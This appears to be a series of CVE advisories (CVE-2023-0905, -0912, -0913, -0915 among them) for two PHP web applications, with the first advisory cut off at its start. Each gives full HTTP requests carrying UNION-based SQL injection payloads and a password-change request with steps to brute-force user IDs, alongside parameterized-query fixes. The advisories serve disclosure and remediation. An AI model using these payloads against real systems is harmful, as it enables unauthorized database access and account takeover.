### Vendor Homepage: > https://www.sourcecodester.com ### Software Link: > [Employee Task Management System](https://www.sourcecodester.com/php/15383/employee-task-management-system-phppdo-free-source-code.html) ### Version: > v 1.0 ### SQL Injection > SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data. ### Affected Page: > edit-task.php > On this page task_id parameter is vulnerable to SQL Injection Attack ### Description: > The employee task management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below + Admin user has full access to the system + Employee user has only a few menu access i.s. Task Management (only assigned tasks) and Attendance (clock In and out) > So, if the admin assigns a task to a normal employee, an employee could perform the SQL Injection by editing that task from his/her profile. Therefore, low-privileged users could able to get the access full system. ### Proof of Concept: > Following steps are involved: + Admin assigned a task to an employee (ABC) + ABC employee edit the task and could perform the SQL injection with vulnerable parameter (edit-task.php?task_id=765) ### Request: ``` GET /etms/edit-task.php?task_id=765%27+and+false+union+select+1,version(),3,database(),user(),6,7--+- HTTP/1.1 Host: localhost sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=ntknjcf821q2u3h85c14qo1r91 Connection: close ``` ### Response: ![image](https://user-images.githubusercontent.com/123810418/219764941-37ede104-c4a5-4500-94f2-2fca6e051343.png) ### Recommendation: > Whoever uses this CMS, should update line no 27 and 28 of edit-task.php with the following code to avoid SQL Injection attack: ``` Old Code: $sql = "SELECT * FROM task_info WHERE task_id='$task_id' "; $info = $obj_admin->manage_all_info($sql); ``` ``` New Code: $sql = $obj_admin->db->prepare("SELECT * FROM task_info WHERE task_id=:task_id "); $sql->bindparam(':task_id', $task_id); $sql->execute(); $row = $sql->fetch(PDO::FETCH_ASSOC); ``` Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo </code></pre>

<pre><code># Employee Task Management System - Broken Authentication leads to compromise of all application accounts by changing the password ### Date: > 17 February 2023 ### CVE Assigned: **[CVE-2023-0905](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0905)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0905), [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0905) ### Author Email: > navaidnasari@hotmail.co.uk ### Vendor Homepage: > https://www.sourcecodester.com ### Software Link: > [Employee Task Management System](https://www.sourcecodester.com/php/15383/employee-task-management-system-phppdo-free-source-code.html) ### Version: > v 1.0 ### Broken Authentication: > Broken authentication occurs when the authentication mechanisms in a web application are not implemented correctly, allowing an attacker to bypass them and gain unauthorized access to the application's features and resources. If an attacker is able to exploit broken authentication and gain access to a user's account, they may be able to change the account password, effectively locking the legitimate user out of the system. This is particularly dangerous because if the attacker can compromise one user account, they may be able to use that account to gain access to other accounts and escalate their privileges, potentially compromising the entire system. ### Affected Page: > changePasswordForEmployee.php > On this page, application isn't verifying the authentication/authorization mechanism. Due to that, all the parameters are vulnerable to broken authentication. ### Description: > Broken Authentication allows unauthenticated remote attacker to change password of all application users ### Proof of Concept: > Following steps are involved: 1. Visit the vulnerable page: changePasswordForEmployee.php 2. Type any random password which needs to update against any user id and submit 3. Intercept that request through Burp Suite 4. Request: ``` POST /etms/changePasswordForEmployee.php HTTP/1.1 Host: localhost Content-Length: 277 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/etms/changePasswordForEmployee.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=ntknjcf821q2u3h85c14qo1r91 Connection: close user_id=%3Cbr+%2F%3E%0D%0A%3Cb%3EWarning%3C%2Fb%3E%3A++Undefined+variable+%24user_id+in+%3Cb%3EC%3A%5Cxampp%5Chtdocs%5Cetms%5CchangePasswordForEmployee.php%3C%2Fb%3E+on+line+%3Cb%3E34%3C%2Fb%3E%3Cbr+%2F%3E%0D%0A&password=admin%23123&re_password=admin%23123&change_password_btn= ``` 5. because the "user_id" parameter is not set due to missing authentication, so we need to set the user_id manually. By default user_id 1 is for admin and we can use intruder to bruteforce this step with incremental value. Whenever the server will find the correct user_id, it will change the password and log in to the application. 6. Successful exploit screenshots are below (without cookie parameter) ![image](https://user-images.githubusercontent.com/123810418/219798138-747388d7-378b-4d1b-9862-1356e52a0c72.png) ![image](https://user-images.githubusercontent.com/123810418/219798264-f04bcda9-a833-4010-a40b-076a38199938.png) ![image](https://user-images.githubusercontent.com/123810418/219798299-5ba92752-d218-4aaa-b123-5258df37ce38.png) 7. Vulnerable Code Snippets: ![image](https://user-images.githubusercontent.com/123810418/219799518-50d3eb1a-0091-4229-b7d0-7621d79cc168.png) ![image](https://user-images.githubusercontent.com/123810418/219799657-42b9a71c-539c-4e91-bec8-0d7fd40cb3ed.png) ### Recommendation: > Whoever uses this CMS, should update the authentication and authorization mechanism on top of the changePasswordForEmployee.php as per their requirement to avoid a Broken Authentication attack Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo </code></pre>

<pre><code># Auto Dealer Management System - SQL Injection on page view_transaction.php and parameter is id, application url is (?page=vehicles/view_transaction&id=?) with low privilege authentication ### Date: > 18 February 2023 ### CVE Assigned: **[CVE-2023-0912](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0912)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0912) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0912) ### Author Name: > Muhammad Navaid Zafar Ansari ### Author Email: > navaidnasari@hotmail.co.uk ### Vendor Homepage: > https://www.sourcecodester.com ### Software Link: > [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html) ### Version: > v 1.0 ### SQL Injection > SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data. ### Affected Page: > view_transaction.php > On this page id parameter is vulnerable to SQL Injection Attack > URL of the vulnerable parameter is: ?page=vehicles/view_transaction&id=* ### Description: > The auto dealer management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below + Admin user has full access to the system + Employee user has only a few menu access i.e. dashboard, car models and vehicle (available and transaction) > Employee could perform the SQL Injection by viewing the vehicle transaction from his/her profile. Therefore, low-privileged users could able to get the access full system. ### Proof of Concept: > Following steps are involved: + An employee view the vehicle transaction and could perform the SQL injection with vulnerable parameter (?page=vehicles/view_transaction&id=5*) ### Request: ``` GET /adms/admin/?page=vehicles/view_transaction&id=5%27+and+false+union+select+1,2,3,4,5,6,7,8,9,database(),version(),12,13,user()--+- HTTP/1.1 Host: localhost sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5 Connection: close ``` ### Response: ![image](https://user-images.githubusercontent.com/123810418/219882001-6031474c-b28b-4401-b282-6ff470086be3.png) ### Recommendation: > Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack: ``` Example Code: $sql = $obj_admin->db->prepare("SELECT *, concat(firstname,' ',COALESCE(concat(middlename,' '), ''), lastname) as customer from `transaction_list` where id = :id "); $sql->bindparam(':id', $id); $sql->execute(); $row = $sql->fetch(PDO::FETCH_ASSOC); ``` Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo -------------------------------------------------------------------------- # Auto Dealer Management System - SQL Injection on page sell_vehicle.php and parameter is id, application url is (?page=vehicles/sell_vehicle&id=?) with low privilege authentication ### Date: > 18 February 2023 ### CVE Assigned: **[CVE-2023-0913](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0913)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0913) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0913) ### Author Name: > Muhammad Navaid Zafar Ansari ### Author Email: > navaidnasari@hotmail.co.uk ### Vendor Homepage: > https://www.sourcecodester.com ### Software Link: > [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html) ### Version: > v 1.0 ### SQL Injection > SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data. ### Affected Page: > sell_vehicle.php > On this page id parameter is vulnerable to SQL Injection Attack > URL of the vulnerable parameter is: ?page=vehicles/sell_vehicle&id=* ### Description: > The auto dealer management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below + Admin user has full access to the system + Employee user has only a few menu access i.e. dashboard, car models and vehicle (available and transaction) > Employee could perform the SQL Injection by opening sell vehicle transaction from his/her profile. Therefore, low-privileged users could able to get the access full system. ### Proof of Concept: > Following steps are involved: + An employee open the sell vehicle transaction form and could perform the SQL injection with vulnerable parameter (?page=vehicles/sell_vehicle&id=1*) ### Request: ``` GET /adms/admin/?page=vehicles/sell_vehicle&id=1%27+and+false+union+select+1,2,version(),database(),5,6,user(),@@datadir,9,10,11,12,13--+- HTTP/1.1 Host: localhost sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5 Connection: close ``` ### Response: ![image](https://user-images.githubusercontent.com/123810418/219883719-cd26586d-694e-49a7-a2ba-deca9445382f.png) ### Recommendation: > Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack: ``` Example Code: $sql = $obj_admin->db->prepare("SELECT * from `transaction_list` where id = :id "); $sql->bindparam(':id', $id); $sql->execute(); $row = $sql->fetch(PDO::FETCH_ASSOC); ``` Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo -------------------------------------------------------------------------- # Auto Dealer Management System - SQL Injection on page manage_user.php and parameter is id, application url is (?page=user/manage_user&id=?) with low privilege authentication. ### Date: > 18 February 2023 ### CVE Assigned: **[CVE-2023-0915](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0915)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0915) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0915) ### Author Name: > Muhammad Navaid Zafar Ansari ### Author Email: > navaidnasari@hotmail.co.uk ### Vendor Homepage: > https://www.sourcecodester.com ### Software Link: > [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html) ### Version: > v 1.0 ### SQL Injection > SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data. ### Affected Page: > manage_user.php > On this page id parameter is vulnerable to SQL Injection Attack > URL of the vulnerable parameter is: ?page=user/manage_user&id=* ### Description: > The auto dealer management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below + Admin user has full access to the system + Employee user has only a few menu access i.e. dashboard, car models and vehicle (available and transaction) > Although, employee user doesn't have manage_user.php access but due to broken access control, employee could able to perform the SQL Injection by opening manage_user.php page. Therefore, low-privileged users could able to get the access full system. ### Proof of Concept: > Following steps are involved: 1. Employee guess the page manager_user.php and pass the random id parameter that parameter is vulnerable to SQL injection (?page=user/manage_user&id=1*) ### Request: ``` GET /adms/admin/?page=user/manage_user&id=1%27+and+false+union+select+1,user(),@@datadir,4,database(),6,7,8,9,10,11--+- HTTP/1.1 Host: localhost sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5 Connection: close ``` ### Response: ![image](https://user-images.githubusercontent.com/123810418/219888637-627e3abb-4b7a-45e6-a22c-3a5c11b75b61.png) ### Recommendation: > Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack: ``` Example Code: $sql = $obj_admin->db->prepare("SELECT * FROM users where id = :id "); $sql->bindparam(':id', $id); $sql->execute(); $row = $sql->fetch(PDO::FETCH_ASSOC); ``` Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo </code></pre>